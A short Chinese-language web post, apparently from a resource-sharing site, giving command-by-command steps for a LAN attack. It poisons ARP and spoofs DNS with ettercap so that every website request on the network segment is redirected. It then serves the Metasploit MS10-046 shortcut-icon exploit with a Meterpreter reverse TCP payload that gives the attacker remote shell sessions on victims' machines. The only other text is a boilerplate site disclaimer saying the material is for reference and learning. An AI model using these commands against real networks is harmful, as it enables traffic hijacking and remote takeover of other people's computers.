【摘要】内网渗透劫持DNS拿到cmdshellifconfig//获取IP及网卡信息leafpad/etc/ettercap/etter.dns//打开文件插入*A记录预设IPserviceapache2start//启动本机apache服务此次不...
内网渗透劫持DNS拿到cmdshell
ifconfig //获取IP及网卡信息leafpad /etc/ettercap/etter.dns //打开文件 插入* A 记录 预设IPservice apache2 start //启动本机apache服务 此次不用启动,使用ms10_046会自动启动//* A ip 劫持所有A记录//*.com A ip 劫持msfconsole //启动msfsearch ms10_046 //搜索ms10_046use exploit/Windows/browser/ms10_046_shortcut_icon_dllloader //设置模块set payload windows/meterpreter/reverse_tcpset lhost ifconfig的ip(本机ip或预设IP) //监听set servhost ifconfig的ip(本机ip或预设IP)exploit //执行ettercap -T -q -i eth0 -P dns_spoof -M arp /// /// //劫持 -i 网卡 -P 插件 ///分别代表 任意IP 任意地址此时同意网段内用户访问网站时会 劫持 并与本机建立会话目标机器上线后 jobs sessions -lsession -i 1
1.本站大部分内容均收集于网络!若内容若侵犯到您的权益,请发送邮件至:duhaomu@163.com,我们将第一时间处理!
2.资源所需价格并非资源售卖价格,是收集、整理、编辑详情以及本站运营的适当补贴,并且本站不提供任何免费技术支持。
3.所有资源仅限于参考和学习,版权归原作者所有,更多请阅读网站声明。